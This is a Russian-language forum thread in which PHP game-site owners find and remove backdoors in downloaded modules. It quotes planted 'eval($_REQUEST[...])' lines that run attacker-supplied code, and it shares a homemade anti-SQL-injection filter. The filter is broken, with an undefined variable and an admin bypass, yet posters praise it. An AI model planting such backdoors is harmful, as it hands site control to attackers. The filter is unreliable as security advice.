MrMatnoos
Участник
Я просто с сайта скачивал, где без дыр модулей не бывает.Kamikadze написал(а):Вообщем удалил все строку... работает все...странно
Rubrika
Участник
- Сообщения
- 342
- Реакции
- 43
а что за модуль-то?)Mrmatnoos написал(а):Я просто с сайта скачивал, где без дыр модулей не бывает.
если правильно понял пожертвованиеRubrika написал(а):а что за модуль-то?)
у меня вообще такого кода нету
Kamikadze
Местный
- Сообщения
- 53
- Реакции
- 5
Я точно тут его скачивал, еще на старой ветки про модули....вроде от туда брал его.kvozimir написал(а):если правильно понял пожертвование
у меня вообще такого кода нету
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Мужики сегодня обнаружил это в логах ,что это и как попало ко мне на сайт : ? подскажите кто сталкивался пожалуйста
[Tue Apr 21 10:18:25 2015] [info] [client 176.109.224.223:18989] AH00128: File does not exist: /home/a/(адрес моего сайта)/public_html/++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xed\xe5+\xed\xe0\xf8\xeb\xee\xf1\xfc+\xf4\xee\xf0\xec\xfb+\xe4\xeb\xff+\xee\xf2\xef\xf0\xe0\xe2\xea\xe8;, referer http://(адрес моего сайта) /++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;
[Tue Apr 21 10:18:25 2015] [info] [client 176.109.224.223:18989] AH00128: File does not exist: /home/a/(адрес моего сайта)/public_html/++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xed\xe5+\xed\xe0\xf8\xeb\xee\xf1\xfc+\xf4\xee\xf0\xec\xfb+\xe4\xeb\xff+\xee\xf2\xef\xf0\xe0\xe2\xea\xe8;, referer http://(адрес моего сайта) /++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;
himik
Участник
- Сообщения
- 230
- Реакции
- 32
Не обращай внимания,тут ничего опасного нет)nikitin2016 написал(а):Мужики сегодня обнаружил это в логах ,что это и как попало ко мне на сайт : ? подскажите кто сталкивался пожалуйста
[Tue Apr 21 10:18:25 2015] [info] [client 176.109.224.223:18989] AH00128: File does not exist: /home/a/(адрес моего сайта)/public_html/++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xed\xe5+\xed\xe0\xf8\xeb\xee\xf1\xfc+\xf4\xee\xf0\xec\xfb+\xe4\xeb\xff+\xee\xf2\xef\xf0\xe0\xe2\xea\xe8;, referer http://(адрес моего сайта) /++++++++++++++++++++++++++++++++++++++++++++++++++++++++Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
- Сообщения
- 280
- Реакции
- 46
Видят - не значит что могут изменять, правильно? И вообще - есть такой тип людей, каких хлебом не корми - дай кого-то потроллить..nikitin2016 написал(а):Мне написали в вконтакте , что мою ферму пытаются взломать после открытия и недели не прошло , и видят некоторые мои директории , всеми указанными способами здесь на форуме закрылся , но эти гады пишут что видят мои файлы и папки , что делать кто подскажет ? ? ?
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
Я удалил только: eval($_REQUEST['db_donations']); и всё работает. Но закрыл ли я дыру этим - не знаю.MrMatnoos написал(а):Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался .
- Сообщения
- 280
- Реакции
- 46
Код:
error_reporting(0); // вывод ошибок
if($_GET['menu']!='admin4ik' && 'support'){
function limpiarez($mensaje){
$mensaje = htmlspecialchars(trim($mensaje));
$mensaje = str_replace("'","′",$mensaje);
$mensaje = str_replace(";","¦",$mensaje);
$mensaje = str_replace("$"," USD ",$mensaje);
$mensaje = str_replace("<","⟨",$mensaje);
$mensaje = str_replace(">","⟩",$mensaje);
$mensaje = str_replace('"',"”",$mensaje);
$mensaje = str_replace("%27"," ",$mensaje);
$mensaje = str_replace("0x29"," ",$mensaje);
$mensaje = str_replace("& amp ","&",$mensaje);
return $mensaje;
}
foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);}
foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);}
foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);}
foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);}
foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);}
foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);}
################## Фильтрация всех POST и GET #######################################
function filter_sf(&$sf_array)
{
while (list ($X,$D) = each ($sf_array)):
$sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D))));
endwhile;
}
filter_sf($_GET);
filter_sf($_POST);
#####################################################################################
function anti_sql()
{
$check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) );
$check = str_replace( "", "/", $check );
$check = mysql_real_escape_string($str);
$check = trim($str);
$check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec");
$check = str_replace($check,"",$str);
if( $check )
{
if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) )
{
$prover = true;
}
if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) )
{
$prover = true;
}
}
if (isset($prover))
{
die( "Попытка атаки на сайт или введены запрещённые символы!" );
return false;
exit;
}
}
anti_sql();
}
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
skroliks написал(а):Код:error_reporting(0); // вывод ошибок if($_GET['menu']!='admin4ik' && 'support'){ function limpiarez($mensaje){ $mensaje = htmlspecialchars(trim($mensaje)); $mensaje = str_replace("'","′",$mensaje); $mensaje = str_replace(";","¦",$mensaje); $mensaje = str_replace("$"," USD ",$mensaje); $mensaje = str_replace("<","⟨",$mensaje); $mensaje = str_replace(">","⟩",$mensaje); $mensaje = str_replace('"',"”",$mensaje); $mensaje = str_replace("%27"," ",$mensaje); $mensaje = str_replace("0x29"," ",$mensaje); $mensaje = str_replace("& amp ","&",$mensaje); return $mensaje; } foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);} foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);} foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);} foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);} foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);} foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);} foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);} foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);} foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);} foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);} ################## Фильтрация всех POST и GET ####################################### function filter_sf(&$sf_array) { while (list ($X,$D) = each ($sf_array)): $sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D)))); endwhile; } filter_sf($_GET); filter_sf($_POST); ##################################################################################### function anti_sql() { $check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) ); $check = str_replace( "", "/", $check ); $check = mysql_real_escape_string($str); $check = trim($str); $check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec"); $check = str_replace($check,"",$str); if( $check ) { if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) ) { $prover = true; } if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) ) { $prover = true; } } if (isset($prover)) { die( "Попытка атаки на сайт или введены запрещённые символы!" ); return false; exit; } } anti_sql(); }
Ставил на все свои проекты, вроде работает, ни разу не взломали. Но еще зависит от хостинга.skroliks написал(а):А кто что скажет про этот код защиты от sql-инъекций? Он вообще работает? И если да - как надежно?
подскажите кто нибудь, куда вставлять этот код ?skroliks написал(а):А кто что скажет про этот код защиты от sql-инъекций? Он вообще работает? И если да - как надежно?Код:error_reporting(0); // вывод ошибок if($_GET['menu']!='admin4ik' && 'support'){ function limpiarez($mensaje){ $mensaje = htmlspecialchars(trim($mensaje)); $mensaje = str_replace("'","′",$mensaje); $mensaje = str_replace(";","¦",$mensaje); $mensaje = str_replace("$"," USD ",$mensaje); $mensaje = str_replace("<","⟨",$mensaje); $mensaje = str_replace(">","⟩",$mensaje); $mensaje = str_replace('"',"”",$mensaje); $mensaje = str_replace("%27"," ",$mensaje); $mensaje = str_replace("0x29"," ",$mensaje); $mensaje = str_replace("& amp ","&",$mensaje); return $mensaje; } foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=limpiarez($HTTP_POST_VARS[$i]);} foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=limpiarez($HTTP_GET_VARS[$i]);} foreach($_POST as $i => $value){$_POST[$i]=limpiarez($_POST[$i]);} foreach($_GET as $i => $value){$_GET[$i]=limpiarez($_GET[$i]);} foreach($_COOKIE as $i => $value){$_COOKIE[$i]=limpiarez($_COOKIE[$i]);} foreach($HTTP_POST_VARS as $i => $value){$HTTP_POST_VARS[$i]=stripslashes($HTTP_POST_VARS[$i]);} foreach($HTTP_GET_VARS as $i => $value){$HTTP_GET_VARS[$i]=stripslashes($HTTP_GET_VARS[$i]);} foreach($_POST as $i => $value){$_POST[$i]=stripslashes($_POST[$i]);} foreach($_GET as $i => $value){$_GET[$i]=stripslashes($_GET[$i]);} foreach($_COOKIE as $i => $value){$_COOKIE[$i]=stripslashes($_COOKIE[$i]);} ################## Фильтрация всех POST и GET ####################################### function filter_sf(&$sf_array) { while (list ($X,$D) = each ($sf_array)): $sf_array[$X] = limpiarez(mysql_escape_string(strip_tags(htmlspecialchars($D)))); endwhile; } filter_sf($_GET); filter_sf($_POST); ##################################################################################### function anti_sql() { $check = html_entity_decode( urldecode( $_SERVER['REQUEST_URI'] ) ); $check = str_replace( "", "/", $check ); $check = mysql_real_escape_string($str); $check = trim($str); $check = array("AND","UNION","SELECT","WHERE","INSERT","UPDATE","DELETE","OUTFILE","FROM","OR","SHUTDOWN","CHANGE","MODIFY","RENAME","RELOAD","ALTER","GRANT","DROP","CONCAT","cmd","exec"); $check = str_replace($check,"",$str); if( $check ) { if((strpos($check, '<')!==false) || (strpos($check, '>')!==false) || (strpos($check, '"')!==false) || (strpos($check,"'")!==false) || (strpos($check, '*')!==false) || (strpos($check, '(')!==false) || (strpos($check, ')')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) || (strpos($check, ' ')!==false) ) { $prover = true; } if((strpos($check, 'src')!==false) || (strpos($check, 'img')!==false) || (strpos($check, 'OR')!==false) || (strpos($check, 'Image')!==false) || (strpos($check, 'script')!==false) || (strpos($check, 'javascript')!==false) || (strpos($check, 'language')!==false) || (strpos($check, 'document')!==false) || (strpos($check, 'cookie')!==false) || (strpos($check, 'gif')!==false) || (strpos($check, 'png')!==false) || (strpos($check, 'jpg')!==false) || (strpos($check, 'js')!==false) ) { $prover = true; } } if (isset($prover)) { die( "Попытка атаки на сайт или введены запрещённые символы!" ); return false; exit; } } anti_sql(); }
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
описание же должно быть.korozist написал(а):подскажите кто нибудь, куда вставлять этот код ?
на форуме есть тема, используйте поиск: код защиты от sql-инъекций
- Сообщения
- 280
- Реакции
- 46
В корневой папке файл index.php после начала функции, после <?PHPkorozist написал(а):подскажите кто нибудь, куда вставлять этот код ?
Sidr23
Местный
- Сообщения
- 54
- Реакции
- 3
А вот эта строка:
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
Блин в топ 10 модуль!
В частности выделенное жирным....
Если удалить, то стр пустая!?! Вот теперь ломаю голову, есть ответы?
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
Блин в топ 10 модуль!
В частности выделенное жирным....
Если удалить, то стр пустая!?! Вот теперь ломаю голову, есть ответы?
Последнее редактирование:
Sidr23
Местный
- Сообщения
- 54
- Реакции
- 3
Так метод научного тыка, привел к тому что удалил весь блок, все заработало!
а если точнее то вот это из кода ввон:
<?PHP
$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
а если точнее то вот это из кода ввон:
<?PHP
$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
Sidr23
Местный
- Сообщения
- 54
- Реакции
- 3
слей себе прогу jsky и сделай скан скрипта, ты увидишь его структуру и за одно проверишь свой на инъекцииnikitin2016 написал(а):Мне написали в вконтакте , что мою ферму пытаются взломать после открытия и недели не прошло , и видят некоторые мои директории , всеми указанными способами здесь на форуме закрылся , но эти гады пишут что видят мои файлы и папки , что делать кто подскажет ? ? ?
ЗЫ Если не найдешь могу скинуть
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
скинь пожалуйстаSidr23 написал(а):слей себе прогу jsky и сделай скан скрипта, ты увидишь его структуру и за одно проверишь свой на инъекции
ЗЫ Если не найдешь могу скинуть